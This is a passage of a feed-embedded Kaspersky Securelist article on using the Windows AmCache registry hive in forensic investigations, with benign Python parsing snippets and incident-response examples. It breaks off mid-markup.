url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30120509/SL-DLL-Hicjacking-detection-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content> </item> <item> <title>Forensic journey: hunting evil within AmCache</title> <link>https://securelist.com/amcache-forensic-artifact/117622/</link> <comments>https://securelist.com/amcache-forensic-artifact/117622/#respond</comments> <dc:creator><![CDATA[Cristian Souza]]></dc:creator> <pubDate>Wed, 01 Oct 2025 10:00:20 +0000</pubDate> <category><![CDATA[SOC, TI and IR posts]]></category> <category><![CDATA[Digital forensics]]></category> <category><![CDATA[Threat hunting]]></category> <category><![CDATA[Researchers tools]]></category> <category><![CDATA[Incident response]]></category> <category><![CDATA[Forensic journey]]></category><category><![CDATA[Cybersecurity]]></category> <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=117622</guid> <description><![CDATA[Kaspersky experts share insights into how AmCache may prove useful during incident investigation, and provide a command line tool to extract data from this artifact.]]></description> <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/01111328/SL-AmCache-forensic-artifact-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="introduction">Introduction</h2><p>When it comes to digital forensics, AmCache plays a vital role in identifying malicious activities in Windows systems. This artifact allows the identification of the execution of both benign and malicious software on a machine. It is managed by the operating system, and at the time of writing this article, there is no known way to modify or remove AmCache data. Thus, in an incident response scenario, it could be the key to identifying lost artifacts (e.g., ransomware that auto-deletes itself), allowing analysts to search for patterns left by the attacker, such as file names and paths. Furthermore, AmCache stores the SHA-1 hashes of executed files, which allows DFIR professionals to search public threat intelligence feeds — such as <a href="https://opentip.kaspersky.com/" target="_blank" rel="noopener">OpenTIP</a> and <a href="https://www.virustotal.com/gui/" target="_blank" rel="noopener">VirusTotal</a> — and generate rules for blocking this same file on other systems across the network.</p><p>This article presents a comprehensive analysis of the AmCache artifact, allowing readers to better understand its inner workings. In addition, we present a new tool named “<a href="https://github.com/cristianzsh/amcache-evilhunter" target="_blank" rel="noopener">AmCache-EvilHunter</a>“, which can be used by any professional to easily parse the <code>Amcache.hve</code> file and extract IOCs. The tool is also able to query the aforementioned intelligence feeds to check for malicious file detections, this level of built-in automation reduces manual effort and speeds up threat detection, which is of significant value for analysts and responders.</p><h2 id="the-importance-of-evidence-of-execution">The importance of evidence of execution</h2><p>Evidence of execution is fundamentally important in digital forensics and incident response, since it helps investigators reconstruct how the system was used during an intrusion. Artifacts such as Prefetch, ShimCache, and <a href="https://securelist.com/userassist-artifact-forensic-value-for-incident-response/116911/" target="_blank" rel="noopener">UserAssist</a> offer clues about what was executed. AmCache is also a robust artifact for evidencing execution, preserving metadata that indicates a file’s presence and execution, even if the file has been deleted or modified. An advantage of AmCache over other Windows artifacts is that unlike them, it stores the file hash, which is immensely useful for analysts, as it can be used to hunt malicious files across the network, increasing the likelihood of fully identifying, containing, and eradicating the threat.</p><h2 id="introduction-to-amcache">Introduction to AmCache</h2><p>Application Activity Cache (AmCache) was first introduced in Windows 7 and fully leveraged in Windows 8 and beyond. Its purpose is to replace the older <code>RecentFileCache.bcf</code> in newer systems. Unlike its predecessor, AmCache includes valuable forensic information about program execution, executed binaries and loaded drivers.</p><p>This artifact is stored as a registry hive file named <code>Amcache.hve</code> in the directory <code>C:\Windows\AppCompat\Programs</code>. The metadata stored in this file includes file paths, publisher data, compilation timestamps, file sizes, and SHA-1 hashes.</p><p>It is important to highlight that the AmCache format does not depend on the operating system version, but rather on the version of the libraries (DLLs) responsible for filling the cache. In this way, even Windows systems with different patch levels could have small differences in the structure of the AmCache files. The known libraries used for filling this cache are stored under <code>%WinDir%\System32</code> with the following names:</p><ul><li>aecache.dll</li><li>aeevts.dll</li><li>aeinv.dll</li><li>aelupsvc.dll</li><li>aepdu.dll</li><li>aepic.dll</li></ul><p>It is worth noting that this artifact has its peculiarities and limitations. The AmCache computes the SHA-1 hash over only the first 31,457,280 bytes (≈31 MB) of each executable, so comparing its stored hash online can fail for files exceeding this size. Furthermore, <code>Amcache.hve</code> is not a true execution log: it records files in directories scanned by the Microsoft Compatibility Appraiser, executables and drivers copied during program execution, and GUI applications that required compatibility shimming. Only the last category reliably indicates actual execution. Items in the first two groups simply confirm file presence on the system, with no data on whether or when they ran.</p><p>In the same directory, we can find additional LOG files used to ensure <code>Amcache.hve</code> consistency and recovery operations:</p><ul><li>C:\Windows\AppCompat\Programs\Amcache.hve.*LOG1</li><li>C:\Windows\AppCompat\Programs\Amcache.hve.*LOG2</li></ul><p>The <code>Amcache.hve</code> file can be collected from a system for forensic analysis using tools like <a href="https://github.com/abaghinyan/aralez" target="_blank" rel="noopener">Aralez</a>, <a href="https://docs.velociraptor.app/downloads/" target="_blank" rel="noopener">Velociraptor</a>, or <a href="https://www.sans.org/tools/kape" target="_blank" rel="noopener">Kape</a>.</p><h2 id="amcache-hve-structure">Amcache.hve structure</h2><p>The <code>Amcache.hve</code> file is a Windows Registry hive in REGF format; it contains multiple subkeys that store distinct classes of data. A simple Python parser can be implemented to iterate through <code>Amcache.hve</code> and present its keys:</p><pre class="urvanov-syntax-highlighter-plain-tag">#!/usr/bin/env python3 import sysfrom Registry.Registry import Registry hive = Registry(str(sys.argv[1]))root = hive.open("Root") for rec in root.subkeys(): print(rec.name())</pre><p>The result of this parser when executed is:</p><div id="attachment_117624" style="width: 1667px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163530/amcache-forensic-artifact1.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117624" class="size-full wp-image-117624" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163530/amcache-forensic-artifact1.png" alt="AmCache keys" width="1657" height="796" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163530/amcache-forensic-artifact1.png 1657w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163530/amcache-forensic-artifact1-300x144.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163530/amcache-forensic-artifact1-1024x492.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163530/amcache-forensic-artifact1-768x369.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163530/amcache-forensic-artifact1-1536x738.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163530/amcache-forensic-artifact1-729x350.png 729w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163530/amcache-forensic-artifact1-740x355.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163530/amcache-forensic-artifact1-583x280.png 583w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163530/amcache-forensic-artifact1-800x384.png 800w" sizes="auto, (max-width: 1657px) 100vw, 1657px" /></a><p id="caption-attachment-117624" class="wp-caption-text">AmCache keys</p></div><p>From a DFIR perspective, the keys that are of the most interest to us are <code>InventoryApplicationFile</code>, <code>InventoryApplication</code>, <code>InventoryDriverBinary</code>, and <code>InventoryApplicationShortcut</code>, which are described in detail in the following subsections.</p><h3 id="inventoryapplicationfile">InventoryApplicationFile</h3><p>The <code>InventoryApplicationFile</code> key is essential for tracking every executable discovered on the system. Under this key, each executable is represented by its own uniquely named subkey, which stores the following main metadata:</p><ul><li><strong>ProgramId:</strong> a unique hash generated from the binary name, version, publisher, and language, with some zeroes appended to the beginning of the hash</li><li><strong>FileID:</strong> the SHA-1 hash of the file, with four zeroes appended to the beginning of the hash</li><li><strong>LowerCaseLongPath:</strong> the full lowercase path to the executable</li><li><strong>Name:</strong> the file base name without the path information</li><li><strong>OriginalFileName:</strong> the original filename as specified in the PE header’s version resource, indicating the name assigned by the developer at build time</li><li><strong>Publisher:</strong> often used to verify if the source of the binary is legitimate. For malware, this subkey is usually empty</li><li><strong>Version:</strong> the specific build or release version of the executable</li><li><strong>BinaryType:</strong> indicates whether the executable is a 32-bit or 64-bit binary</li><li><strong>ProductName:</strong> the ProductName field from the version resource, describing the broader software product or suite to which the executable belongs</li><li><strong>LinkDate: </strong>the compilation timestamp extracted from the PE header</li><li><strong>Size:</strong> the file size in bytes</li><li><strong>IsOsComponent:</strong> a boolean flag that specifies whether the executable is a built-in OS component or a third-party application/library</li></ul><p>With some tweaks to our original Python parser, we can read the information stored within this key:</p><pre class="urvanov-syntax-highlighter-plain-tag">#!/usr/bin/env python3 import sysfrom Registry.Registry import Registry hive = Registry(sys.argv[1])root = hive.open("Root") subs = {k.name(): k for k in root.subkeys()}parent = subs.get("InventoryApplicationFile") for rec in parent.subkeys(): vals = {v.name(): v.value() for v in rec.values()} print("{}\n{}\n\n-----------\n".format(rec, vals))</pre><p><div id="attachment_117625" style="width: 1345px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163907/amcache-forensic-artifact2.jpeg" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117625" class="size-full wp-image-117625" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163907/amcache-forensic-artifact2.jpeg" alt="InventoryApplicationFile subkeys" width="1335" height="560" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163907/amcache-forensic-artifact2.jpeg 1335w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163907/amcache-forensic-artifact2-300x126.jpeg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163907/amcache-forensic-artifact2-1024x430.jpeg 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163907/amcache-forensic-artifact2-768x322.jpeg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163907/amcache-forensic-artifact2-834x350.jpeg 834w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163907/amcache-forensic-artifact2-740x310.jpeg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163907/amcache-forensic-artifact2-668x280.jpeg 668w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163907/amcache-forensic-artifact2-800x336.jpeg 800w" sizes="auto, (max-width: 1335px) 100vw, 1335px" /></a><p id="caption-attachment-117625" class="wp-caption-text">InventoryApplicationFile subkeys</p></div><p>We can also use tools like Registry Explorer to see the same data in a graphical way:</p><div id="attachment_117626" style="width: 1295px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164000/amcache-forensic-artifact3.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117626" class="size-full wp-image-117626" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164000/amcache-forensic-artifact3.png" alt="InventoryApplicationFile inspected through Registry Explorer" width="1285" height="546" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164000/amcache-forensic-artifact3.png 1285w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164000/amcache-forensic-artifact3-300x127.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164000/amcache-forensic-artifact3-1024x435.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164000/amcache-forensic-artifact3-768x326.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164000/amcache-forensic-artifact3-824x350.png 824w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164000/amcache-forensic-artifact3-740x314.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164000/amcache-forensic-artifact3-659x280.png 659w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164000/amcache-forensic-artifact3-800x340.png 800w" sizes="auto, (max-width: 1285px) 100vw, 1285px" /></a><p id="caption-attachment-117626" class="wp-caption-text">InventoryApplicationFile inspected through Registry Explorer</p></div><p>As mentioned before, AmCache computes the SHA-1 hash over only the first 31,457,280 bytes (≈31 MB). To prove this, we did a small experiment, during which we got a binary smaller than 31 MB (Aralez) and one larger than this value (a custom version of Velociraptor). For the first case, the SHA-1 hash of the entire binary was stored in AmCache.</p><div id="attachment_117627" style="width: 1720px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164055/amcache-forensic-artifact4.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117627" class="size-full wp-image-117627" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164055/amcache-forensic-artifact4.png" alt="First AmCache SHA-1 storage scenario" width="1710" height="561" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164055/amcache-forensic-artifact4.png 1710w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164055/amcache-forensic-artifact4-300x98.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164055/amcache-forensic-artifact4-1024x336.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164055/amcache-forensic-artifact4-768x252.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164055/amcache-forensic-artifact4-1536x504.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164055/amcache-forensic-artifact4-1067x350.png 1067w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164055/amcache-forensic-artifact4-740x243.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164055/amcache-forensic-artifact4-853x280.png 853w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164055/amcache-forensic-artifact4-800x262.png 800w" sizes="auto, (max-width: 1710px) 100vw, 1710px" /></a><p id="caption-attachment-117627" class="wp-caption-text">First AmCache SHA-1 storage scenario</p></div><p>For the second scenario, we used the dd utility to extract the first 31 MB of the Velociraptor binary:</p><div id="attachment_117628" style="width: 1566px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164152/amcache-forensic-artifact5.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117628" class="size-full wp-image-117628" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164152/amcache-forensic-artifact5.png" alt="Stripped binary" width="1556" height="375" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164152/amcache-forensic-artifact5.png 1556w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164152/amcache-forensic-artifact5-300x72.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164152/amcache-forensic-artifact5-1024x247.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164152/amcache-forensic-artifact5-768x185.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164152/amcache-forensic-artifact5-1536x370.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164152/amcache-forensic-artifact5-1452x350.png 1452w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164152/amcache-forensic-artifact5-740x178.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164152/amcache-forensic-artifact5-1162x280.png 1162w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164152/amcache-forensic-artifact5-800x193.png 800w" sizes="auto, (max-width: 1556px) 100vw, 1556px" /></a><p id="caption-attachment-117628" class="wp-caption-text">Stripped binary</p></div><p>When checking the Velociraptor entry on AmCache, we found that it indeed stored the SHA-1 hash calculated only for the first 31,457,280 bytes of the binary. Interestingly enough, the Size value represented the actual size of the original file. Thus, relying only on the file hash stored on AmCache for querying threat intelligence portals may be not enough when dealing with large files. So, we need to check if the file size in the record is bigger than 31,457,280 bytes before searching threat intelligence portals.</p><div id="attachment_117629" style="width: 1720px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164250/amcache-forensic-artifact6.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117629" class="size-full wp-image-117629" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164250/amcache-forensic-artifact6.png" alt="Second AmCache SHA-1 storage scenario" width="1710" height="552" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164250/amcache-forensic-artifact6.png 1710w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164250/amcache-forensic-artifact6-300x97.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164250/amcache-forensic-artifact6-1024x331.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164250/amcache-forensic-artifact6-768x248.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164250/amcache-forensic-artifact6-1536x496.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164250/amcache-forensic-artifact6-1084x350.png 1084w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164250/amcache-forensic-artifact6-740x239.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164250/amcache-forensic-artifact6-867x280.png 867w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164250/amcache-forensic-artifact6-800x258.png 800w" sizes="auto, (max-width: 1710px) 100vw, 1710px" /></a><p id="caption-attachment-117629" class="wp-caption-text">Second AmCache SHA-1 storage scenario</p></div><p>Additionally, attackers may take advantage of this characteristic to purposely generate large malicious binaries. In this way, even if investigators find that a malware was executed/present on a Windows system, the actual SHA-1 hash of the binary will still be unknown, making it difficult to track it across the network and gathering it from public databases like VirusTotal.</p><h4 id="inventoryapplicationfile-use-case-example-finding-a-deleted-tool-that-was-used">InventoryApplicationFile – use case example: finding a deleted tool that was used</h4><p>Let’s suppose you are searching for a possible insider threat. The user denies having run any suspicious programs, and any suspicious software was securely erased from disk. But in the InventoryApplicationFile, you find a record of winscp.exe being present in the user’s Downloads folder. Even though the file is gone, this tells you the tool was on the machine and it was likely used to transfer files before being deleted. In our incident response practice, we have seen similar cases, where this key proved useful.</p><h3 id="inventoryapplication">InventoryApplication</h3><p>The <code>InventoryApplication</code> key records details about applications that were previously installed on the system. Unlike <code>InventoryApplicationFile</code>, which logs every executable encountered, <code>InventoryApplication</code> focuses on those with installation records. Each entry is named by its unique ProgramId, allowing straightforward linkage back to the corresponding InventoryApplicationFile key. Additionally, <code>InventoryApplication</code> has the following subkeys of interest:</p><ul><li><strong>InstallDate:</strong> a date‑time string indicating when the OS first recorded or recognized the application</li><li><strong>MsiInstallDate:</strong> present only if installed via Windows Installer (MSI); shows the exact time the MSI package was applied, sourced directly from the MSI metadata</li><li><strong>UninstallString:</strong> the exact command line used to remove the application</li><li><strong>Language:</strong> numeric locale identifier set by the developer (LCID)</li><li><strong>Publisher:</strong> the name of the software publisher or vendor</li><li><strong>ManifestPath:</strong> the file path to the installation manifest used by UWP or AppX/MSIX apps</li></ul><p>With a simple change to our parser, we can check the data contained in this key:</p><pre class="urvanov-syntax-highlighter-plain-tag"><...>parent = subs.get("InventoryApplication")<...></pre><p><div id="attachment_117630" style="width: 1355px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165005/amcache-forensic-artifact7.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117630" class="size-full wp-image-117630" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165005/amcache-forensic-artifact7.png" alt="InventoryApplication subkeys" width="1345" height="345" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165005/amcache-forensic-artifact7.png 1345w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165005/amcache-forensic-artifact7-300x77.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165005/amcache-forensic-artifact7-1024x263.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165005/amcache-forensic-artifact7-768x197.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165005/amcache-forensic-artifact7-740x190.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165005/amcache-forensic-artifact7-1092x280.png 1092w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165005/amcache-forensic-artifact7-800x205.png 800w" sizes="auto, (max-width: 1345px) 100vw, 1345px" /></a><p id="caption-attachment-117630" class="wp-caption-text">InventoryApplication subkeys</p></div><p>When a <code>ProgramId</code> appears both here and under <code>InventoryApplicationFile</code>, it confirms that the executable is not merely present or executed, but was formally installed. This distinction helps us separate ad-hoc copies or transient executions from installed software. The following figure shows the <code>ProgramId</code> of the WinRAR software under <code>InventoryApplicationFile</code>.</p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165157/amcache-forensic-artifact8.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117631" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165157/amcache-forensic-artifact8.png" alt="" width="1434" height="480" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165157/amcache-forensic-artifact8.png 1434w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165157/amcache-forensic-artifact8-300x100.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165157/amcache-forensic-artifact8-1024x343.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165157/amcache-forensic-artifact8-768x257.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165157/amcache-forensic-artifact8-1046x350.png 1046w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165157/amcache-forensic-artifact8-740x248.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165157/amcache-forensic-artifact8-837x280.png 837w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165157/amcache-forensic-artifact8-800x268.png 800w" sizes="auto, (max-width: 1434px) 100vw, 1434px" /></a></p><p>When searching for the <code>ProgramId</code>, we find an exact match under <code>InventoryApplication</code>. This confirms that WinRAR was indeed installed on the system.</p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165257/amcache-forensic-artifact9.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117632" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165257/amcache-forensic-artifact9.png" alt="" width="1435" height="421" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165257/amcache-forensic-artifact9.png 1435w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165257/amcache-forensic-artifact9-300x88.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165257/amcache-forensic-artifact9-1024x300.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165257/amcache-forensic-artifact9-768x225.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165257/amcache-forensic-artifact9-1193x350.png 1193w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165257/amcache-forensic-artifact9-740x217.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165257/amcache-forensic-artifact9-954x280.png 954w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165257/amcache-forensic-artifact9-800x235.png 800w" sizes="auto, (max-width: 1435px) 100vw, 1435px" /></a></p><p>Another interesting detail about <code>InventoryApplication</code> is that it contains a subkey named <code>LastScanTime</code>, which is stored separately from <code>ProgramIds</code> and holds a value representing the last time the Microsoft Compatibility Appraiser ran. This is a scheduled task that launches the <code>compattelrunner.exe</code> binary, and the information in this key should only be updated when that task executes. As a result, software installed since the last run of the Appraiser may not appear here. The <code>LastScanTime</code> value is stored in <strong>Windows FileTime</strong> format.</p><div id="attachment_117633" style="width: 888px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165538/amcache-forensic-artifact10.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117633" class="size-full wp-image-117633" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165538/amcache-forensic-artifact10.png" alt="InventoryApplication LastScanTime information" width="878" height="118" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165538/amcache-forensic-artifact10.png 878w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165538/amcache-forensic-artifact10-300x40.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165538/amcache-forensic-artifact10-768x103.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165538/amcache-forensic-artifact10-740x99.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165538/amcache-forensic-artifact10-800x108.png 800w" sizes="auto, (max-width: 878px) 100vw, 878px" /></a><p id="caption-attachment-117633" class="wp-caption-text">InventoryApplication LastScanTime information</p></div><h4 id="inventoryapplication-use-case-example-spotting-remote-access-software">InventoryApplication – use case example: spotting remote access software</h4><p>Suppose that during an incident response engagement, you find an entry for AnyDesk in the InventoryApplication key (although the application is not installed anymore). This means that the attacker likely used it for remote access and then removed it to cover their tracks. Even if wiped from disk, this key proves it was present. We have seen this scenario in real-world cases more than once.</p><h3 id="inventorydriverbinary">InventoryDriverBinary</h3><p>The <code>InventoryDriverBinary</code> key records every kernel-mode driver that the system has loaded, providing the essential metadata needed to spot suspicious or malicious drivers. Under this key, each driver is captured in its own uniquely named subkey and includes:</p><ul><li><strong>FileID</strong>: the SHA-1 hash of the driver binary, with four zeroes appended to the beginning of the hash</li><li><strong>LowerCaseLongPath</strong>: the full lowercase file path to the driver on disk</li><li><strong>DigitalSignature</strong>: the code-signing certificate details. A valid, trusted signature helps confirm the driver’s authenticity</li><li><strong>LastModified</strong>: the file’s last modification timestamp from the filesystem metadata, revealing when the driver binary was most recently altered on disk</li></ul><p>Because Windows drivers run at the highest privilege level, they are frequently exploited by malware. For example, a previous study conducted by Kaspersky shows that attackers are <a href="https://securelist.com/av-killer-exploiting-throttlestop-sys/117026/" target="_blank" rel="noopener">exploiting vulnerable drivers for killing EDR processes</a>. When dealing with a cybersecurity incident, investigators correlate each driver’s cryptographic hash, file path, signature status, and modification timestamp. That can help in verifying if the binary matches a known, signed version, detecting any tampering by spotting unexpected modification dates, and flagging unsigned or anomalously named drivers for deeper analysis. Projects like <a href="https://www.loldrivers.io/" target="_blank" rel="noopener">LOLDrivers</a> help identify vulnerable drivers in use by attackers in the wild.</p><div id="attachment_117634" style="width: 1460px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165732/amcache-forensic-artifact11.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117634" class="size-full wp-image-117634" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165732/amcache-forensic-artifact11.png" alt="InventoryDriverBinary inspection" width="1450" height="533" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165732/amcache-forensic-artifact11.png 1450w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165732/amcache-forensic-artifact11-300x110.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165732/amcache-forensic-artifact11-1024x376.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165732/amcache-forensic-artifact11-768x282.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165732/amcache-forensic-artifact11-952x350.png 952w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165732/amcache-forensic-artifact11-740x272.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165732/amcache-forensic-artifact11-762x280.png 762w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165732/amcache-forensic-artifact11-800x294.png 800w" sizes="auto, (max-width: 1450px) 100vw, 1450px" /></a><p id="caption-attachment-117634" class="wp-caption-text">InventoryDriverBinary inspection</p></div><p>In addition to the <code>InventoryDriverBinary</code>, AmCache also provides the <code>InventoryApplicationDriver</code> key, which keeps track of all drivers that have been installed by specific applications. It includes two entries:</p><ul><li><strong>DriverServiceName</strong>, which identifies the name of the service linked to the installed driver; and</li><li><strong>ProgramIds</strong>, which lists the program identifiers (corresponding to the key names under <code>InventoryApplication</code>) that were responsible for installing the driver.</li></ul><p>As shown in the figure below, the <code>ProgramIds</code> key can be used to track the associated program that uses this driver:</p><div id="attachment_117635" style="width: 1565px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170026/amcache-forensic-artifact12.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117635" class="size-full 